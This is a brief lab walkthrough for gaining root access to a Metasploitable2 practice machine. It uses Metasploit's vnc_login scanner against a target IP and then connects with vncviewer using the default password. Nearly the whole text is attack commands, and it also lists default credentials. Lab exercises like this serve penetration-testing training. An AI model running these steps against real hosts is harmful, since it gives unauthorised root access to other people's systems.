1. Start Kali Linux and Metasploitable2 Linux
2. On Kali Linux
Sudo su –
Password:kali
3. Launch metasploit framework from Exploitation Tools
>search vnc login
>use auxiliary/scanner/vnc/vnc_login
>set rhosts [target_ip]
>run
4. Open another Terminal on Kali Linux
$vncviewer [target_ip]
Password:password
Note- You will require to type Password as password.
You will get access to remote Metasploitable 2 Linux using VNC Viewer as root user.